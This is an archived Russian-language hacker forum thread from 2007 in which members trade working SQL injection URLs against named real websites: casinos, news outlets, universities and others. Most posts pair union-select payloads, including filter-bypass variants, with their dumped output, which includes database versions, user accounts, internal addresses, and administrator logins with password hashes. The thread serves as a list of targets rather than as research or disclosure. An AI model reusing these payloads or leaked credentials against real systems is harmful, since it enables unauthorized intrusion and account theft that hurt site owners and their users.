HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.12.2007, 03:18
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Пройдёмся по казино.
Пять близнецов штоле? Не могу увидеть где выводится инфа. Ногами не бить- в скулях совсем зелен и несведущь.

Код HTML:
http://www.casinos-virtuels.net/description-casino.php?id=23+orde r+by+28/*
Код HTML:
http://www.casino-jeu.net/casino.php?id=54+order+b y+28/*
Код HTML:
http://www.annuaire-casino.net/casino.php?id=9+or der+by+28/*
Код HTML:
http://www.01-casino.com/casino.php?id=17+ order+by+28/*
Код HTML:
http://www.jeu-casino-online.com/casino.php?id=4+union+select+1 ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28/*
 
Ответить с цитированием

  #2  
Старый 25.12.2007, 03:37
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

минусенг в параметре поставь и увидишь:
Цитата:
http://www.jeu-casino-online.com/casino.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #3  
Старый 25.12.2007, 06:02
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://ballshooter.com/games/?c=category&category=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+partners/*
Код:
http://www.tctux.com/php/showContent.php?linkid=-6+union+select+VERSION()/*
Код:
http://www.7casinoonline.com/it/poker.php?ID=-1682+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11/*
Код:
http://www.jeu-casino-online.com/poker.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

Последний раз редактировалось SWAT; 25.12.2007 в 06:13..
 
Ответить с цитированием

http://www.big6.com/
  #4  
Старый 25.12.2007, 09:41
4Dfx
Новичок
Регистрация: 06.12.2007
Сообщений: 11
Провел на форуме:
120052

Репутация: 30
Отправить сообщение для 4Dfx с помощью ICQ
По умолчанию http://www.big6.com/

Цитата:
http://www.big6.com/showarticle.php?id=-1+union+select+1,2,3,4,5/*
poll_user:
user_id
username
userpass
session
last_visit
Цитата:
http://www.big6.com/showarticle.php?id=-1+union+select+CONCAT(%20user_id,%20CHAR(32,58,32) ,%20username,%20CHAR(32,58,32),%20userpass),2,3,4, 5+from+poll_user/*
Админка http://www.big6.com/admin/
admin : d158b1d234953b66bfc119f17f800b7b
wp_users:
ID
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name
Цитата:
http://www.big6.com/showarticle.php?id=-1+union+select+CONCAT(ID,%20CHAR(32,58,32),user_lo gin,%20CHAR(32,58,32),user_pass,%20CHAR(32,58,32), %20user_email),2,3,4,5+from+wp_users/*
http://www.big6.com/blog/wp-login.php
admin : c49938ea11089d6a7783a28469b64edf
sue : e7e9ec3723447a642f762b2b6a15cfd7
laura : 73bc892f0b1ea86bf8e39656ad1e0d26
mike : bfd9f0cc586164634e1b9a255069ca5f
carrie : 2ccf2e8d12b57c2b2a58af053033dcd0
theresa : 85fb5505ee3d6f3976a00cb248822d38
 
Ответить с цитированием

  #5  
Старый 25.12.2007, 11:05
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

www.100baz.ru

Код:
http://www.100baz.ru/info.php?id=54+AND+23%3d(SELECT+COUNT(table_name)+FROM+information_schema.tables)
Количество таблиц в базе (вместе со служебными таблицами information_schema.tables) - 23.
Юзерские таблицы:
bag
client
region
rubrika
t_news
tovar
 
Ответить с цитированием

Usera не подобрал pass:pass1234
  #6  
Старый 25.12.2007, 12:37
JIyka
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018

Репутация: 25
Отправить сообщение для JIyka с помощью ICQ
По умолчанию Usera не подобрал pass:pass1234

http://www.lilstructuraldesign.ro/work.php?id=-1+union+select+1,2,3,concat_ws(0x3a,id,pass),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,5 8+from+users/*
 
Ответить с цитированием

  #7  
Старый 25.12.2007, 13:17
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Если цензура будет не очень строгой, то будет видео по Франции

А пока...

artslivres.com
Код:
http://artslivres.com/ShowArticles.php?TypeAffichage=ParEditeur&NEdition=35&Editeur=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*
4.0.25-standard-log:artslivres001:artslivres001@10.0.65.166

etgarim.co.il - кто знает иврит - копайте глубже!
Код:
http://www.etgarim.co.il/showSection.php?id=-1+union+select+1,convert(concat_ws(0x3a,version(),database(),user())+using+latin1),3,4,5/*&type=game
4.1.11-standard:etgarim_db:etgarim_user@localhost

Юзеры:
Код:
http://www.etgarim.co.il/showSection.php?id=-1+union+select+1,convert(concat_ws(0x3a,username,password,email)+using+latin1),3,4,5+from+users+limit+0,1/*&type=game
 
Ответить с цитированием

  #8  
Старый 25.12.2007, 13:25
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Код HTML:
http://www.politcom.ru/article.php?id=-5492+UNION+SELECT+concat(user(),0x3a,database(),0x3a,version())/*
W_POLIT@195.42.160.28:W_POLIT:4.1.20-1.GMS

2 JIyka
Код HTML:
http://www.lilstructuraldesign.ro/work.php?id=-1+union+select+1,2,3,4,5,concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+users/*
1:amro:b4af804009cb036a4ccdc33431ef9ac9

Последний раз редактировалось ~EviL~; 25.12.2007 в 13:30..
 
Ответить с цитированием

  #9  
Старый 25.12.2007, 15:15
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

cavi.dk
Код:
http://www.cavi.dk/showarticle.php?id=-1/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),4,5,6/*&newsletter_id=8
4.1.18:cavi_nyhedsbrev:cavidb@localhost
с фильтрами постарались...

studyport.info
Код:
http://studyport.info/viewdetails.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
4.1.22-log : portua_studybank : portua_studybank@apollo

iwsf.com - International Water Ski Federation
Код:
http://www.iwsf.com/dbheadlines/showarticle.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*
4.0.27-standard-log:db204576552:dbo204576552@74.208.16.37

urummage.com
Код:
http://www.urummage.com/articles/showarticle.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())/*
4.1.22-standard-log:urummag_urummag:urummag_dba@web1.infinology.co m
 
Ответить с цитированием

  #10  
Старый 25.12.2007, 16:18
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

Вот и от меня немного...
www.maxnormal.tv
Код:
http://www.maxnormal.tv/magazine.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6+from+%20%20users+limit+0,1+--+
4.1.11-Debian_4sarge7:africandopeco@10.1.3.41:africandope _co_za_-_waddy
Код:
http://www.maxnormal.tv/magazine.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),4,5,6+from+users+limit+0,1+--+
matt : 1a1dc91c907325c69271ddf0c944bc72 : pass
www.deltarescue.tv
Код:
http://www.deltarescue.tv/deltarescue/war/item.php?id=-1+union+select+version(),2,3,4,5,6,7+--+
4.0.24_Debian-10sarge2-log:deltarescue@localhost:deltarescue
www.llbn.tv
Код:
http://www.llbn.tv/index.php?option=com_na_content&task=view&id=55-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+
4.1.10a-Max:hzhnkrhe@localhost:llbn-netadventist-org
www.canallatino.tv
Код:
http://www.canallatino.tv/x2/index.php?id=2&seccion=3&noticia=1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16+--+
.1.15-Debian_1-log:new_users@localhost:new_users'>.1.15-Debian_1-log:new_users@localhost:n...
www.music.indiana.edu
Код:
http://www.music.indiana.edu/apps/prelude/new/index.php?id=4495'+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
5.0.22:sitevisitor@localhost:musevents
www.stnersess.edu
Код:
http://www.stnersess.edu/schoolFacultyInfo/alumni/details.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15+--+
4.0.27-standard:stnerses_db@localhost:stnerses_db
ieee.metu.edu
Код:
http://ieee.metu.edu/alaattin/v2/detay.php?catid=9&id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),3,4,5,6,7+--+
4.1.11-Debian_4sarge7:alaattin@localhost:alaattindb
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ